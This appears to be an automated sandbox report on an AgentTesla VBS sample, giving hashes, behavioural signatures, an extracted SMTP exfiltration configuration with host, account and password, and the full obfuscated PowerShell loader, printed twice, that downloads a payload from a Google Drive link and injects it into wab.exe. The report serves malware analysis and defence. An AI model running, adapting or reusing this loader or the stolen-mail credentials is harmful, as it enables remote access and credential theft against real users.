Analysis
-
max time kernel
141s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20240220-en -
resource tags
arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system -
submitted
19-06-2024 14:49
Static task
static1
Behavioral task
behavioral1
Sample
03cbdd488fd6819ccfafa38dedf10ab4db2e9d447e69ee89f539255941ad511d.vbs
Resource
win7-20240220-en
General
-
Target
03cbdd488fd6819ccfafa38dedf10ab4db2e9d447e69ee89f539255941ad511d.vbs
-
Size
92KB
-
MD5
1a0f278542c1a82b36d2a9339c44343f
-
SHA1
7464df5fb5eae9f2bb2de37aac91729be222c801
-
SHA256
03cbdd488fd6819ccfafa38dedf10ab4db2e9d447e69ee89f539255941ad511d
-
SHA512
4e3e255185ffe407661cd5f6ef18aceaf39e4b7410926e14c2580fe9ba7a5ba3edbdf5834c03eec9662ab6b111da262ba5f8632e3304766eb99f42a60eb62ec6
-
SSDEEP
1536:w01/LsA0DnkdzhX7RXaSMmr2rFHxsASgxWxCwhrdM5R/:w09LB0DnWzhX7RXaSMxhxsAhWEwhrdMT
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
mail.myhydropowered.com - Port:
587 - Username:
[email protected] - Password:
0TFiRgPxmCJcdSB - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid Process 5 1224 powershell.exe 7 1224 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 13 api.ipify.org 14 api.ipify.org 15 ip-api.com -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
wab.exepid Process 2608 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exewab.exepid Process 2000 powershell.exe 2608 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid Process procid_target PID 2000 set thread context of 2608 2000 powershell.exe 34 -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exewab.exepid Process 1224 powershell.exe 2000 powershell.exe 2000 powershell.exe 2608 wab.exe 2608 wab.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid Process 2000 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exewab.exedescription pid Process Token: SeDebugPrivilege 1224 powershell.exe Token: SeDebugPrivilege 2000 powershell.exe Token: SeDebugPrivilege 2608 wab.exe -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
WScript.exepowershell.exepowershell.exedescription pid Process procid_target PID 3036 wrote to memory of 1224 3036 WScript.exe 28 PID 3036 wrote to memory of 1224 3036 WScript.exe 28 PID 3036 wrote to memory of 1224 3036 WScript.exe 28 PID 1224 wrote to memory of 2788 1224 powershell.exe 30 PID 1224 wrote to memory of 2788 1224 powershell.exe 30 PID 1224 wrote to memory of 2788 1224 powershell.exe 30 PID 1224 wrote to memory of 2000 1224 powershell.exe 32 PID 1224 wrote to memory of 2000 1224 powershell.exe 32 PID 1224 wrote to memory of 2000 1224 powershell.exe 32 PID 1224 wrote to memory of 2000 1224 powershell.exe 32 PID 2000 wrote to memory of 1528 2000 powershell.exe 33 PID 2000 wrote to memory of 1528 2000 powershell.exe 33 PID 2000 wrote to memory of 1528 2000 powershell.exe 33 PID 2000 wrote to memory of 1528 2000 powershell.exe 33 PID 2000 wrote to memory of 2608 2000 powershell.exe 34 PID 2000 wrote to memory of 2608 2000 powershell.exe 34 PID 2000 wrote to memory of 2608 2000 powershell.exe 34 PID 2000 wrote to memory of 2608 2000 powershell.exe 34 PID 2000 wrote to memory of 2608 2000 powershell.exe 34 PID 2000 wrote to memory of 2608 2000 powershell.exe 34
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\03cbdd488fd6819ccfafa38dedf10ab4db2e9d447e69ee89f539255941ad511d.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:3036 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle 1 "cls;$Enchisel = 1;$Skvt='ring';$Procreativity218='S';Function Tvivlesyg($tablehopped){$Strangulates=$tablehopped.Length-$Enchisel;$Stiksaars=$Procreativity218+'ubst'+$Skvt;For( $vaporisers=7;$vaporisers -lt $Strangulates;$vaporisers+=8){$Donnie+=$tablehopped.$Stiksaars.Invoke( $vaporisers, $Enchisel);}$Donnie;}function Oversway($Ynglestedernes){ . ($Hjemsgelse) ($Ynglestedernes);}$Tiplet=Tvivlesyg ' Sed.elMStershaoDidymisz Hurry.i AkvarilSy heeklinextr a unolog/Prisonf5Ioniser.Sultana0Plateau Topa,ol( PrinteWleukophiYdmygstnGldelsedkomediaoEndel,gw Mercedsblokker ,tabstaN Strst T Pr pre Grometr1 Perine0Brtsejl.Ukrnkel0Aa nend;cinquef A,venarWUndis,oi Impa.snra,gedn6i citat4Fundame;Unidyll E.ilicsx Antise6Sekunde4Furcife; Im,alm DramatirUnirascv L,erst:Program1Scattie2P.imrko1Rabbitl. Tampon0Serjean)Lgetsob Pesh.toGkontr leCantatoc bucibak.ncrankoEndoper/ Ophtha2Unossif0Plastom1Nulpunk0Ne vebu0Fulth,r1 Handma0Reformp1Beachhe GuldaldFKudizeoiUdgrfter rlenate,uccinifAciculuoaglipayxLnindeh/Resgues1avancem2Optaell1Startel.Forspil0Latente ';$Leucadendron=Tvivlesyg ' Au,optUAppeases .kkemoe,lankearT,aditi-NarcissAGiordang eje,doeSal.antn Kdva,etRefl ks ';$Enhardy=Tvivlesyg ' LaborahTri,ngut HjlpeptDriftsipGaleasesSvingta:Con lob/Subtaxo/vebgernd LairmerfremmeliKv.ddervInksta e ma,rop. Pr gragSmalskuo AdjudaoKlipning.loreatlBeseecheHaspnin.Autogencambulato Rentenm Unhurr/Daoinesu Samme.cEn iche?Paaskese Ko,sulxliflighpanhuggeo IdemanrChieft tRestbal=stoffrid Po.byco Rep,riwpa sionn Jeopa,lGalapagoBum.assaMessi.gdAldocoo&Gnidni.iKo.dnindOverdoz=F,ntina1Chassep_SceneriNExaratiXRisikobtComptinWCrappi L,ntipudoHvedemewIndoktrEDermatrLJoker eOT.rnebr3Adiat eAMentaluw Adminil,emalsnTRemolliGIm.atieXSuppl m2.raktatJ SeminaRbob,nerPOtoplasLIn.rejsdAdderesc JennetR Lyk,es1Reentraa.rstninXasnerscE HemidaRInvpegaJPaatage ';$Eigenvalues=Tvivlesyg ' gump.i>Fo.blff ';$Hjemsgelse=Tvivlesyg 'Arbejd.iAdjoin.eproduk x Skn.it ';$Stadselige='Bkkenbenets';$Woodspite = Tvivlesyg 'FlseneseBordskacKalciumhYclepedoKrystal Clurica%CosuretaCaveaeppmeningspBirdbatd DratteaKjllertt GelatiaTele.on%.odulud\OverhalSS,burbacNonscierFlaskeaoLokalavu,eathergUndersteKartone.Skraa eSBesin ewFjer,gtiSibbss. urbopr&Narcoti&Overmen Mongrele Aalbe.cQerssheh Skolelo Postlu sarco,otIndices ';Oversway (Tvivlesyg 'Trevang$Kighullg.ykologlKneepieoCon.umabTreeshiau,womanlOverbas: fagemeAOutpassfs.mbionfFa.tiglyFricatirInters,iFodboldnBebopp,gPeroliasLectorsr W.xinga Pr,ssimLangtrupPullulaeTeltligrAfpri,ns Kumysb=Sacchar( Eniguac aarg nmMangonedLaurasp Re.ogni/Teemingc D.ainl Smreri$Sho esfWPhrenoloUdkasteo Hypodidkropsvis fe.ledpSurfboaiUdgivelt Unboxee,allele)Avarit. ');Oversway (Tvivlesyg 'For,tag$girondeg F eratlTyvst,loHydrosebP.steuraR,ddersl Napole:SnderjyS .ommany Fordums KommistMonarkieUrigtigmAnte ebuTil,ager D utereKanoniss Tele n= Greesa$UnreplaE,tundern StillfhSurretoaGrac,lurSentimedSubgrapyParoemi. SkaktesU,municpSl,venel DispeoiSlakytetFos erh(Tmmermn$ CamphiENondea,iTrvejorg Denns,equidd enFelixspvBrudeudaFemtenalElleve.u trypsieGenkaldsPhiloso)Baarebu ');Oversway (Tvivlesyg 'special[OmodyniNCymricjeVilligstSvejsef.KvittepS UndeteeSta,darrUfordjevSup osaiRep imecTouchileVegetarP Hen,edoDechifriInterrunof entltInkenbuMNit,ogeaSorrywanLi,jesta Hipp,pgOrganise.xtradurrevolub]Plenumd: Subdue:ChannelSEanmisdeO.ersigcVgkon,auB,ttermrChoryzai,anhapitYngle.tycephaloPfoelgevrconcilio NonpertTrickiloOver,nccUnpenneo DrikkelSsonfor Ka ital= Iagtta Knebler[OparbejNnicolinebesmreltMellem,.overwovSTandemmeNominalcUnderglurodekasrTherma iBugcerttCr ftmayTemplesPButchesrRekogn.oBa,dendtEuascomoSystolicNichisroT.pehuslApodedeTFlugte.yAb,nnemp FiskeaeRemplac]Superex:Asexual:Mill,reT Emydinl,ryptodsCo,nect1Birkies2Pectina ');$Enhardy=$Systemures[0];$Hypokinetic= (Tvivlesyg 'Disk ej$Stt.epigHentydelFrak aloCochoncbErklrinaGlanspelAmylops:CecilsuMSubstanaCytostolDod eraiImper agMalars,nMelasseeGondr crAfs reds Konfig=TromsteN pottyseSor,seswKullagr- kmacroO FecalcbfaunernjFoder,ee,lonrevc M,ologt Oppo,i SunnsuStegneomy irenssA bejdstcoxorane AdminimDimers,. DiskofNRumak seLi.leskt veget .AprildaWAffronteMult.cibPass.viCVipstjelbegrebsiembou heZygomycn Bitbltt');$Hypokinetic+=$Affyringsrampers[1];Oversway ($Hypokinetic);Oversway (Tvivlesyg 'Cuisi,i$ SpindeMOnondaga DisketlRepavedi SyltetgObjectinW.lburte MemorarGastronsUndervi. FlocciH Kekchie A,toniaKppetordudho.deediatomar Strik,s Fa,tsa[Outyiel$TransskLIncur aeTropekluSmaaligcForhuseaSymp omd.rosaekeHustruenGoldenwdDistrahrProstatoyaroviznv ffelj]Syneriz=Overdra$SolicitTAnoeticij panvgpCapriccl MangeseForretntGrillst ');$Nonadjudicated=Tvivlesyg 'Agrom z$Ent popMFornaglaCycliselDescriai ConvengFastsaenpuckableUdbytterpreentes pfenni.magthavDEnaarinoIcterinwNotabiln He erolProduktoconspicaPana.ead,ubjectF eprousi avigel blgetrem,terin( Slutor$ AntiksE Photodn Stolpehtr.ssmaadiarkterMaharandUddeligyFrandse,.orklar$Blles.mO La.roioRainproc CitolayIrresonsMultivetKib ages G.stro)Ineff.r ';$Oocysts=$Affyringsrampers[0];Oversway (Tvivlesyg ' hirten$ FestligAdia.helAfbrksboVaterlibParaciuaOwllikel Boobie:Krim,krB Accouna bedsp,bImpingebTingfstlTonsilleDampdredReautho=Indeksa( NationTWaistcoeCubo des OvillutTirsdag- holismPOpmrksoaBrasnentStboldehMuskula Trusser$ForedesOContagioPerora.cFejteneyImdegaas Knifeptal.rmersu.fritn)udmugni ');while (!$Babbled) {Oversway (Tvivlesyg ' Fritlb$rv nessgUd,ortelDiskeseoSaxofonbHormoniaPreaddil Grns.f:tilregnM SlibesiBestiklcEldrev,rReassa.oGryntencDukkerthTi bageiKlatch,rCannonboSvitserpFjorte,tTrefoileRoo,aanrDatam.taSolvemenM dgaae=Piskefl$Uhin,retIllegalr Dekantu efraine Unname ') ;Oversway $Nonadjudicated;Oversway (Tvivlesyg 'D.celerSAlienatt irdleaBismethr Arb.ritSa.sons-SkemabuSK,astralAtticise elatineManifesp hunden patined4Vagnarb ');Oversway (Tvivlesyg 'Oligosy$FeifrefgSalgsvalAwe,lyioNonecumbOpgiveta BuckeylHydroae:Stear nBMerudgia Penetrb Fiskesbbureaucl Forttse Idiomedtrykfje=myxop.y(MalaromTHofjg.reUnprodesv,lkomst Deling-DyrepenPPoliovaapseudobtLitote h ensket Caddien$ An.ilsONonlarcoFlageolcGeophagy unparosSyvkantt Deft.ysMo oriz)Easies ') ;Oversway (Tvivlesyg 'Bio oci$StdpudegPimperilInsubduoStegebob.iruettaMilieutlHyp chr:Rig.andHDi ownayForpaknb HuslejaAnlg.panHiredsqt Fri.kehNerveliu GodvilsSawsmit=Central$S.rumalgTe sturlLimousio.adedlyb Selv,vaCoccololDyrenav: Huks,eGLavad laHewettil Def.ktl Regnspe.ryntprrManualeeGenstarnNimblewsSprregr2 Anti,i0Repe,ce4Isogona+Jul,aft+Cirklel%Torisnu$Soap laS Vicenty PulpstsTrimerit GennemeHuffilymB otheruPotentirCervicoeCyrillis Pr.imb.NoncalccSpaltepoVenten,uKrops.inRadi,let.midazo ') ;$Enhardy=$Systemures[$Hybanthus];}$Krigsfangers=349622;$Countermands=30457;Oversway (Tvivlesyg 'Monof a$Deu,schgUpharsil M.sedioFirlotbbTrngslea mpshemlStilett:skienssDSmallhoeKontr.lr Tudl,keUnbellilRantmuciKa ayafc Faste,tIndentusFormumn Lugsome= Indfoe EtageadGJededi eTrassertFe,iesy- LgformC ChequeoLytforvn Tr erstRecent.eUsaglignChessart bivoks Lyctida$ MetodiOBlousesoRivindfcprotegeyDisagresdromaeotEvidenssF.nansl ');Oversway (Tvivlesyg 'Pens,on$SkglavegLumenallSparekao R,glanb mellemaFrekvenlOverres:Brandmes Hy.ogenLuxembuaDybstrupCevichesAllove eAlexandtU,frsleiho agognSlvstolg SkjteseUnsamplt SmeltnsUmaleta T.xamet=Vaabenh Resorpt[ RibbonS,lkekarySkuddensB,ttinatsukkeute Supposm Combur. owbaneCOutdwelo Paillen PishogvUnbittie Au,oblrextrasctUnraile] Okse.u:Lyk,eop:DypningF LigedarRet.rdioFyge,anmExaminiBNereideata aceasAcajoubeGaldest6Dilata 4SildebeSSkjtendtillusiorTil.oldi Recursn PantstgMocking(Cabotin$NstmindD BlumineSpeditirWaddi.reStud relSelvforisprangscUdvirknt Semicosour,bie)Copepod ');Oversway (Tvivlesyg 'Dugperl$s,omatogFinhvallBivuakeoBli sedb Yobbo.aU listnlStrmmen: OpkrvnE PoleaxtU,elikah Platyro Chl rixAerodyniCook aseCunjergs Amaret1Citr.ll1Epoxyla9Skomage Depermi=konjunk Fyrr.tr[temp raSMejslinyTridimes ookhot ScenogedisgrosmHje meh. AerobaTfarvemee ReratexSystemptSjleso.. eltmarETartufinKursliscPalatoroBrushpodtredjegiGlyptotnGartnerg Presol] Gr ofx: Trying: TilthsALiddenfSTrellisCKkkenboIDaakalvIWhitesi. AnchisGSoftbale un,ramtCompartS KongretKrage.orSlaggedi OverponRullersgF shmou(outland$Tildigts PrevienForsknia Ra.finpkulbuelsDalstrgeHyperdit AerostiSubdepanHopefulg,ladderehemicyctEro.ogesBize.ma)P.rsone ');Oversway (Tvivlesyg 'Hypercy$Varpet.g,wiftenlLegatesoR ggersb,urisdiaNaturlolrocke s:StyringS PostichAftopnioMangilyvTrowabliMoskusknSubethfgNatbord=Theater$StichosEEkspo,etFysiurghbukse,noAloysiaxLemperui T gneseV.ndudssLushnes1 Brneli1Karenst9Purlgse.RetropesMilvusiuDubietibAntikvasFlappert BodhisrBrugskuiSalgsstn Coventg Dressm(Jernfor$ FintmaKP,leogerStrkni.i KrlgtegNonpenasRevendffTak,eska Cathetn F.ldepgLindedeeBesparerVerdenssVin,ues,Konkre,$ BespirCPosteroo SpegepuRaaglasnKarbonatSluddere Platear.nefuldm.anacetaForsty.nSoarer dSkriftesUnrem,t) A,hron ');Oversway $Shoving;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1224 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scrouge.Swi && echo t"3⤵PID:2788
-
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;$Enchisel = 1;$Skvt='ring';$Procreativity218='S';Function Tvivlesyg($tablehopped){$Strangulates=$tablehopped.Length-$Enchisel;$Stiksaars=$Procreativity218+'ubst'+$Skvt;For( $vaporisers=7;$vaporisers -lt $Strangulates;$vaporisers+=8){$Donnie+=$tablehopped.$Stiksaars.Invoke( $vaporisers, $Enchisel);}$Donnie;}function Oversway($Ynglestedernes){ . ($Hjemsgelse) ($Ynglestedernes);}$Tiplet=Tvivlesyg ' Sed.elMStershaoDidymisz Hurry.i AkvarilSy heeklinextr a unolog/Prisonf5Ioniser.Sultana0Plateau Topa,ol( PrinteWleukophiYdmygstnGldelsedkomediaoEndel,gw Mercedsblokker ,tabstaN Strst T Pr pre Grometr1 Perine0Brtsejl.Ukrnkel0Aa nend;cinquef A,venarWUndis,oi Impa.snra,gedn6i citat4Fundame;Unidyll E.ilicsx Antise6Sekunde4Furcife; Im,alm DramatirUnirascv L,erst:Program1Scattie2P.imrko1Rabbitl. Tampon0Serjean)Lgetsob Pesh.toGkontr leCantatoc bucibak.ncrankoEndoper/ Ophtha2Unossif0Plastom1Nulpunk0Ne vebu0Fulth,r1 Handma0Reformp1Beachhe GuldaldFKudizeoiUdgrfter rlenate,uccinifAciculuoaglipayxLnindeh/Resgues1avancem2Optaell1Startel.Forspil0Latente ';$Leucadendron=Tvivlesyg ' Au,optUAppeases .kkemoe,lankearT,aditi-NarcissAGiordang eje,doeSal.antn Kdva,etRefl ks ';$Enhardy=Tvivlesyg ' LaborahTri,ngut HjlpeptDriftsipGaleasesSvingta:Con lob/Subtaxo/vebgernd LairmerfremmeliKv.ddervInksta e ma,rop. Pr gragSmalskuo AdjudaoKlipning.loreatlBeseecheHaspnin.Autogencambulato Rentenm Unhurr/Daoinesu Samme.cEn iche?Paaskese Ko,sulxliflighpanhuggeo IdemanrChieft tRestbal=stoffrid Po.byco Rep,riwpa sionn Jeopa,lGalapagoBum.assaMessi.gdAldocoo&Gnidni.iKo.dnindOverdoz=F,ntina1Chassep_SceneriNExaratiXRisikobtComptinWCrappi L,ntipudoHvedemewIndoktrEDermatrLJoker eOT.rnebr3Adiat eAMentaluw Adminil,emalsnTRemolliGIm.atieXSuppl m2.raktatJ SeminaRbob,nerPOtoplasLIn.rejsdAdderesc JennetR Lyk,es1Reentraa.rstninXasnerscE HemidaRInvpegaJPaatage ';$Eigenvalues=Tvivlesyg ' gump.i>Fo.blff ';$Hjemsgelse=Tvivlesyg 'Arbejd.iAdjoin.eproduk x Skn.it ';$Stadselige='Bkkenbenets';$Woodspite = Tvivlesyg 'FlseneseBordskacKalciumhYclepedoKrystal Clurica%CosuretaCaveaeppmeningspBirdbatd DratteaKjllertt GelatiaTele.on%.odulud\OverhalSS,burbacNonscierFlaskeaoLokalavu,eathergUndersteKartone.Skraa eSBesin ewFjer,gtiSibbss. urbopr&Narcoti&Overmen Mongrele Aalbe.cQerssheh Skolelo Postlu sarco,otIndices ';Oversway (Tvivlesyg 'Trevang$Kighullg.ykologlKneepieoCon.umabTreeshiau,womanlOverbas: fagemeAOutpassfs.mbionfFa.tiglyFricatirInters,iFodboldnBebopp,gPeroliasLectorsr W.xinga Pr,ssimLangtrupPullulaeTeltligrAfpri,ns Kumysb=Sacchar( Eniguac aarg nmMangonedLaurasp Re.ogni/Teemingc D.ainl Smreri$Sho esfWPhrenoloUdkasteo Hypodidkropsvis fe.ledpSurfboaiUdgivelt Unboxee,allele)Avarit. ');Oversway (Tvivlesyg 'For,tag$girondeg F eratlTyvst,loHydrosebP.steuraR,ddersl Napole:SnderjyS .ommany Fordums KommistMonarkieUrigtigmAnte ebuTil,ager D utereKanoniss Tele n= Greesa$UnreplaE,tundern StillfhSurretoaGrac,lurSentimedSubgrapyParoemi. SkaktesU,municpSl,venel DispeoiSlakytetFos erh(Tmmermn$ CamphiENondea,iTrvejorg Denns,equidd enFelixspvBrudeudaFemtenalElleve.u trypsieGenkaldsPhiloso)Baarebu ');Oversway (Tvivlesyg 'special[OmodyniNCymricjeVilligstSvejsef.KvittepS UndeteeSta,darrUfordjevSup osaiRep imecTouchileVegetarP Hen,edoDechifriInterrunof entltInkenbuMNit,ogeaSorrywanLi,jesta Hipp,pgOrganise.xtradurrevolub]Plenumd: Subdue:ChannelSEanmisdeO.ersigcVgkon,auB,ttermrChoryzai,anhapitYngle.tycephaloPfoelgevrconcilio NonpertTrickiloOver,nccUnpenneo DrikkelSsonfor Ka ital= Iagtta Knebler[OparbejNnicolinebesmreltMellem,.overwovSTandemmeNominalcUnderglurodekasrTherma iBugcerttCr ftmayTemplesPButchesrRekogn.oBa,dendtEuascomoSystolicNichisroT.pehuslApodedeTFlugte.yAb,nnemp FiskeaeRemplac]Superex:Asexual:Mill,reT Emydinl,ryptodsCo,nect1Birkies2Pectina ');$Enhardy=$Systemures[0];$Hypokinetic= (Tvivlesyg 'Disk ej$Stt.epigHentydelFrak aloCochoncbErklrinaGlanspelAmylops:CecilsuMSubstanaCytostolDod eraiImper agMalars,nMelasseeGondr crAfs reds Konfig=TromsteN pottyseSor,seswKullagr- kmacroO FecalcbfaunernjFoder,ee,lonrevc M,ologt Oppo,i SunnsuStegneomy irenssA bejdstcoxorane AdminimDimers,. DiskofNRumak seLi.leskt veget .AprildaWAffronteMult.cibPass.viCVipstjelbegrebsiembou heZygomycn Bitbltt');$Hypokinetic+=$Affyringsrampers[1];Oversway ($Hypokinetic);Oversway (Tvivlesyg 'Cuisi,i$ SpindeMOnondaga DisketlRepavedi SyltetgObjectinW.lburte MemorarGastronsUndervi. FlocciH Kekchie A,toniaKppetordudho.deediatomar Strik,s Fa,tsa[Outyiel$TransskLIncur aeTropekluSmaaligcForhuseaSymp omd.rosaekeHustruenGoldenwdDistrahrProstatoyaroviznv ffelj]Syneriz=Overdra$SolicitTAnoeticij panvgpCapriccl MangeseForretntGrillst ');$Nonadjudicated=Tvivlesyg 'Agrom z$Ent popMFornaglaCycliselDescriai ConvengFastsaenpuckableUdbytterpreentes pfenni.magthavDEnaarinoIcterinwNotabiln He erolProduktoconspicaPana.ead,ubjectF eprousi avigel blgetrem,terin( Slutor$ AntiksE Photodn Stolpehtr.ssmaadiarkterMaharandUddeligyFrandse,.orklar$Blles.mO La.roioRainproc CitolayIrresonsMultivetKib ages G.stro)Ineff.r ';$Oocysts=$Affyringsrampers[0];Oversway (Tvivlesyg ' hirten$ FestligAdia.helAfbrksboVaterlibParaciuaOwllikel Boobie:Krim,krB Accouna bedsp,bImpingebTingfstlTonsilleDampdredReautho=Indeksa( NationTWaistcoeCubo des OvillutTirsdag- holismPOpmrksoaBrasnentStboldehMuskula Trusser$ForedesOContagioPerora.cFejteneyImdegaas Knifeptal.rmersu.fritn)udmugni ');while (!$Babbled) {Oversway (Tvivlesyg ' Fritlb$rv nessgUd,ortelDiskeseoSaxofonbHormoniaPreaddil Grns.f:tilregnM SlibesiBestiklcEldrev,rReassa.oGryntencDukkerthTi bageiKlatch,rCannonboSvitserpFjorte,tTrefoileRoo,aanrDatam.taSolvemenM dgaae=Piskefl$Uhin,retIllegalr Dekantu efraine Unname ') ;Oversway $Nonadjudicated;Oversway (Tvivlesyg 'D.celerSAlienatt irdleaBismethr Arb.ritSa.sons-SkemabuSK,astralAtticise elatineManifesp hunden patined4Vagnarb ');Oversway (Tvivlesyg 'Oligosy$FeifrefgSalgsvalAwe,lyioNonecumbOpgiveta BuckeylHydroae:Stear nBMerudgia Penetrb Fiskesbbureaucl Forttse Idiomedtrykfje=myxop.y(MalaromTHofjg.reUnprodesv,lkomst Deling-DyrepenPPoliovaapseudobtLitote h ensket Caddien$ An.ilsONonlarcoFlageolcGeophagy unparosSyvkantt Deft.ysMo oriz)Easies ') ;Oversway (Tvivlesyg 'Bio oci$StdpudegPimperilInsubduoStegebob.iruettaMilieutlHyp chr:Rig.andHDi ownayForpaknb HuslejaAnlg.panHiredsqt Fri.kehNerveliu GodvilsSawsmit=Central$S.rumalgTe sturlLimousio.adedlyb Selv,vaCoccololDyrenav: Huks,eGLavad laHewettil Def.ktl Regnspe.ryntprrManualeeGenstarnNimblewsSprregr2 Anti,i0Repe,ce4Isogona+Jul,aft+Cirklel%Torisnu$Soap laS Vicenty PulpstsTrimerit GennemeHuffilymB otheruPotentirCervicoeCyrillis Pr.imb.NoncalccSpaltepoVenten,uKrops.inRadi,let.midazo ') ;$Enhardy=$Systemures[$Hybanthus];}$Krigsfangers=349622;$Countermands=30457;Oversway (Tvivlesyg 'Monof a$Deu,schgUpharsil M.sedioFirlotbbTrngslea mpshemlStilett:skienssDSmallhoeKontr.lr Tudl,keUnbellilRantmuciKa ayafc Faste,tIndentusFormumn Lugsome= Indfoe EtageadGJededi eTrassertFe,iesy- LgformC ChequeoLytforvn Tr erstRecent.eUsaglignChessart bivoks Lyctida$ MetodiOBlousesoRivindfcprotegeyDisagresdromaeotEvidenssF.nansl ');Oversway (Tvivlesyg 'Pens,on$SkglavegLumenallSparekao R,glanb mellemaFrekvenlOverres:Brandmes Hy.ogenLuxembuaDybstrupCevichesAllove eAlexandtU,frsleiho agognSlvstolg SkjteseUnsamplt SmeltnsUmaleta T.xamet=Vaabenh Resorpt[ RibbonS,lkekarySkuddensB,ttinatsukkeute Supposm Combur. owbaneCOutdwelo Paillen PishogvUnbittie Au,oblrextrasctUnraile] Okse.u:Lyk,eop:DypningF LigedarRet.rdioFyge,anmExaminiBNereideata aceasAcajoubeGaldest6Dilata 4SildebeSSkjtendtillusiorTil.oldi Recursn PantstgMocking(Cabotin$NstmindD BlumineSpeditirWaddi.reStud relSelvforisprangscUdvirknt Semicosour,bie)Copepod ');Oversway (Tvivlesyg 'Dugperl$s,omatogFinhvallBivuakeoBli sedb Yobbo.aU listnlStrmmen: OpkrvnE PoleaxtU,elikah Platyro Chl rixAerodyniCook aseCunjergs Amaret1Citr.ll1Epoxyla9Skomage Depermi=konjunk Fyrr.tr[temp raSMejslinyTridimes ookhot ScenogedisgrosmHje meh. AerobaTfarvemee ReratexSystemptSjleso.. eltmarETartufinKursliscPalatoroBrushpodtredjegiGlyptotnGartnerg Presol] Gr ofx: Trying: TilthsALiddenfSTrellisCKkkenboIDaakalvIWhitesi. AnchisGSoftbale un,ramtCompartS KongretKrage.orSlaggedi OverponRullersgF shmou(outland$Tildigts PrevienForsknia Ra.finpkulbuelsDalstrgeHyperdit AerostiSubdepanHopefulg,ladderehemicyctEro.ogesBize.ma)P.rsone ');Oversway (Tvivlesyg 'Hypercy$Varpet.g,wiftenlLegatesoR ggersb,urisdiaNaturlolrocke s:StyringS PostichAftopnioMangilyvTrowabliMoskusknSubethfgNatbord=Theater$StichosEEkspo,etFysiurghbukse,noAloysiaxLemperui T gneseV.ndudssLushnes1 Brneli1Karenst9Purlgse.RetropesMilvusiuDubietibAntikvasFlappert BodhisrBrugskuiSalgsstn Coventg Dressm(Jernfor$ FintmaKP,leogerStrkni.i KrlgtegNonpenasRevendffTak,eska Cathetn F.ldepgLindedeeBesparerVerdenssVin,ues,Konkre,$ BespirCPosteroo SpegepuRaaglasnKarbonatSluddere Platear.nefuldm.anacetaForsty.nSoarer dSkriftesUnrem,t) A,hron ');Oversway $Shoving;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2000 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scrouge.Swi && echo t"4⤵PID:1528
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2608
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8KB
MD5bdbffd38aaa980265fd1c77b0aaf4e5f
SHA1841cbd0639dae47588ee6b8df96913c7591b2972
SHA2567f33b721d070f46062950b6f911bf686d88cfed96f282f1e85d1b5ce582a0cc0
SHA512d96d23b41504729b27a19695610bc7f1d2407a63d143e56bc32bd181b82c3f10ddf4194ee8b85154b1eff9d756997d08e29bc22ab5bc61ef4afc918cdb2ef4da
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XJIHEOZVIJUM3A5FV6UP.temp
Filesize7KB
MD54a3f90c4fc2e2cd2fad2a2ef38450277
SHA1cf710b9b4453da4587753344430ba4d68232e85d
SHA256fbeef3fc8305f2903da9ab884bd2017b586281e06210253cacc88dc747d0a449
SHA512c8f359f5a5c4925c5852dde20c4442f93cf849691c35f8e5fc15340ae7ef2e0efd696c345c6becb2b65dfd5129b7c375f1d3dffd5d7e3303e6ac22ac84df1689
-
Filesize
494KB
MD5be60fe46432e08e827aeefd9f72d5790
SHA17322ebc77810e84976136174258dddde78a23f27
SHA2568722cb6fe1e75ddcd9127b92f438e2b0155eab29cc29270ca7aa35be9edff7b4
SHA51272a7e93c1c1d78260ec1ac1438450baf4d6f21a1299824878e405a115c8318796d7bf233db80d42f8d66ab1c73531741965fbf1e9679a1fb2071bab9d8b9e913